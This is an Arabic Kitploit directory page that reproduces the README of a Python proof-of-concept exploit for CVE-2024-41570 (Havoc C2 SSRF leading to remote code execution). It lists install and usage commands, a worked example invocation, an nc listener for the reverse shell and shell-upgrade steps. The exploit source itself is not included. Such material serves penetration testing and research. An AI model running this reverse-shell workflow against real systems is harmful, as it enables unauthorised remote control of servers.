Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-41570 — استغلال الصدفة العكسية الآلي عبر WebSocket | Havoc-C2-SSRF مع RCE | Kitploit
أدوات/GitHubGitHub/diemoeve/cve-2024-41570
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعد
GitHubdiemoeve/cve-2024-41570

CVE-2024-41570

استغلال الصدفة العكسية الآلي عبر WebSocket | Havoc-C2-SSRF مع RCE

عرض المستودع
122منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-41570 | Havoc C2 SSRF مع RCE | استغلال شل عكسي آلي عبر WebSocket

يوفر هذا المشروع نصًا برمجيًا لإثبات المفهوم (PoC) مبنيًا على Python لاستغلال خدمة قائمة على WebSocket ضعيفة. يقوم البرنامج النصي بأتمتة تسجيل الوكيل، توصيل حمولة WebSocket، وتنفيذ الأوامر عن بُعد لإنشاء شل عكسي.

الميزات

  • يسجل وكيلًا في الخدمة المستهدفة.
  • يفتح WebSocket ويرسل حمولات المصافحة والمصادقة.
  • ينفذ الأوامر عن بُعد عبر شل عكسي.
  • يوفر سير عمل موجه مع تعليمات واضحة.

المتطلبات الأساسية

  • تثبيت Python 3.x على جهازك.
  • تثبيت التبعيات المطلوبة بتشغيل:
    root@kitploit:~
    pip install -r requirements.txt
    

التثبيت

  1. استنساخ هذا المستودع:
    root@kitploit:~
    git clone https://github.com/kit4py/CVE-2024-41570.git
    
  2. الانتقال إلى دليل المشروع:
    root@kitploit:~
    cd CVE-2024-41570
    
  3. تثبيت التبعيات:
    root@kitploit:~
    pip install -r requirements.txt
    

الاستخدام

شغل البرنامج النصي مع الوسائط المطلوبة:

root@kitploit:~
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>

الوسائط

  • -t: عنوان URL الهدف لخادم WebSocket.
  • -i: عنوان IP لخادم الفريق من Havoc.
  • -p: المنفذ لخادم الفريق من Havoc.
  • -U: اسم المستخدم لمصادقة WebSocket.
  • -P: كلمة المرور لمصادقة WebSocket.
  • -l: عنوان IP للمستمع للشل العكسي (جهازك).
  • -L: منفذ المستمع للشل العكسي (جهازك).

مثال على الأمر

root@kitploit:~
python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444

خطوات التنفيذ

  1. تأكد من أن الخدمة المستهدفة قيد التشغيل وضعيفة.
  2. شغل البرنامج النصي بالمعاملات المطلوبة.
  3. في محطة طرفية منفصلة، ابدأ مستمعًا:
    root@kitploit:~
    nc -lvnp <listener_port>
    
  4. ترقية الشل:
    root@kitploit:~
    python -c 'import pty; pty.spawn("/bin/bash")' 
    export TERM=xterm-256color
    stty rows 67 columns 318
    

التبعيات

يتطلب البرنامج النصي مكتبات Python التالية:

  • requests
  • pycryptodome

قم بتثبيتها باستخدام الأمر:

root@kitploit:~
pip install -r requirements.txt

إشعار أمني

هذا البرنامج النصي مخصص للأغراض التعليمية فقط. تأكد من حصولك على إذن صريح لاختبار النظام المستهدف. قد يؤدي سوء استخدام هذا البرنامج النصي إلى انتهاك القوانين والمبادئ التوجيهية الأخلاقية.

المراجع

مستوحى من Default Havoc Poc

المساهمة

المساهمات مرحب بها! لا تتردد في عمل Fork للمستودع وتقديم طلب سحب.

الترخيص

هذا المشروع مرخص بموجب رخصة MIT. راجع ملف LICENSE للحصول على التفاصيل.

تنزيل الأداة